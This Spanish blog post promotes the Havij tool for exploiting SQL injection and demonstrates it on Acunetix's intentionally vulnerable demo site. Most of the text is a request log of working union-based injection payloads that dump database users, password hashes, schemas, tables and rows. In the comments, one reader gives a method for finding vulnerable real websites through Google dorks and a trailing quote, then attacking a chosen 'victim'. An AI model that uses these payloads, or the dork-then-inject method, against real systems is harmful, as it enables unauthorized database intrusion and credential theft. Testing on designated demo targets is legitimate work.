Explota inyecciones SQL fácilmente con Havij

Havij es una herramienta que nos facilitará la explotación de vulnerabilidades de inyección SQL en aplicaciones web. Rápidamente podremos hacer un fingerprint de la base de datos, obtener los usuarios y los hashes de sus contraseñas, dumpear tablas y columnas, volcar datos, ejecutar sentencias SQL e incluso acceder al sistema de ficheros y ejecutar comandos en el sistema operativo.

Os recomendamos probar la versión 1.15 free que, aunque tiene algunas limitaciones, seguro que os resultará útil y os dará una idea de su facilidad de uso.

Para abrir boca, en esta entrada veremos rápidamente su funcionamiento contra el portal de demo de Acunetix. Simplemente para comenzar tenemos que identificar un punto de inyección:
http://testphp.vulnweb.com/artists.php?artist=1'

Y a continuación especificar la URL en el Target para empezar a extraer datos:





Rápidamente comprobaréis como, en un abrir y cerrar de ojos, obtenemos de forma transparente tablas, columnas, datos, etc... y es que uno se siente como un script kiddie usando Havij, aunque siempre podremos interceptar las peticiones e investigar alguna de sus SQLi:

1 GET http://testphp.vulnweb.com:80/artists.php?artist=1 HTTP/1.1     => HTTP/1.1 200 OK     [0.781 s]
3 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9 HTTP/1.1 => HTTP/1.1 200 OK [0.359 s]
4 GET http://testphp.vulnweb.com:80/artists.php?artist=1+and+1%3D1 HTTP/1.1 => HTTP/1.1 200 OK [0.407 s]
5 GET http://testphp.vulnweb.com:80/artists.php?artist=1+and+1%3E1 HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
6 GET http://testphp.vulnweb.com:80/artists.php?artist=1+and+1%3D1 HTTP/1.1 => HTTP/1.1 200 OK [0.344 s]
7 GET http://testphp.vulnweb.com:80/artists.php?artist=1%27 HTTP/1.1 => HTTP/1.1 200 OK [0.235 s]
8 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2130000+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.516 s]
9 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2140100+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.469 s]
10 GET http://testphp.vulnweb.com:80/artists.php?artist=%2F*%2150000+1*%2F HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]
11 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
12 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.313 s]
13 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+0x31303235343830303536%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.266 s]
14 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2C0x7233646D3076335F68766A5F696E6A656374696F6E%2C0x27%2C0x7e%29+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.312 s]
15 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.25 s]
16 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.296 s]
17 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28version%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.375 s]
18 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28database%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.234 s]
19 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28system_user%28%29+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
20 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40hostname+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.187 s]
21 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28%40%40basedir+as+char%29%29%29%2C0x27%2C0x7e%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.281 s]
22 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28user+as+char%29%29%29%2C0x3a%2Cunhex%28Hex%28cast%28password+as+char%29%29%29%2C0x3a%2Cunhex%28Hex%28cast%28host+as+char%29%29%29%2C0x27%2C0x7e%29+from+mysql.user+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.219 s]
23 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28GRANTEE+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.user_privileges+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.312 s]
24 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28GRANTEE+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.user_privileges+limit+1%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.203 s]
25 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+0%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.406 s]
26 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+1%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.328 s]
27 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+2%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]
28 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+distinct+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28schema_name+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.schemata+limit+3%2C1%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.266 s]
29 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28table_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x616375617274%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.297 s]
30 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28table_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.tables+where+table_schema%3D0x616375617274%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.422 s]
31 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28column_name%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x616375617274+and+table_name%3D0x61727469737473%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.281 s]
32 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28group_concat%28column_name%29+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60information_schema%60.columns+where+table_schema%3D0x616375617274+and+table_name%3D0x61727469737473%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.282 s]
33 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Ccount%28*%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists%29%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.25 s]
34 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28artists.artist_id+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists+Order+by+artist_id+limit+0%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.234 s]
35 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28artists.artist_id+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists+Order+by+artist_id+limit+1%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.187 s]
36 GET http://testphp.vulnweb.com:80/artists.php?artist=999999.9+union+all+select+%28select+concat%280x7e%2C0x27%2Cunhex%28Hex%28cast%28artists.artist_id+as+char%29%29%29%2C0x27%2C0x7e%29+from+%60acuart%60.artists+Order+by+artist_id+limit+2%2C1%29+%2C0x31303235343830303536%2C0x31303235343830303536-- HTTP/1.1 => HTTP/1.1 200 OK [0.281 s]

3 comentarios :

  1. ¿Por qué sabes que ese es un punto de inyección?
    es decir, ¿cómo lo detectas?

    ResponderEliminar
    Respuestas
    1. Porque la url genera un warning: mysql_fetch_array como se ve en la imagen. Es una forma de detectarlo

      Eliminar
  2. Un consejo. Usar un "dork" un Dork es buscar páginas vulnerables en Google. Si por ejemplo, tu víctima es alguien relacionado con la pederastia y has descubierto su web, digamos: papaya. Com por decir algo, ya que buscamos msql en PHP :en Google teclear el Dork : papaya? =id? Por ejemplo. Cuando un resultado sea id=3 por ejemplo, SL final de la URL pon una comilla ' si te arroja (msql error) la página es vulnerable y ya puedes colocar la URL en el target de havij.

    ResponderEliminar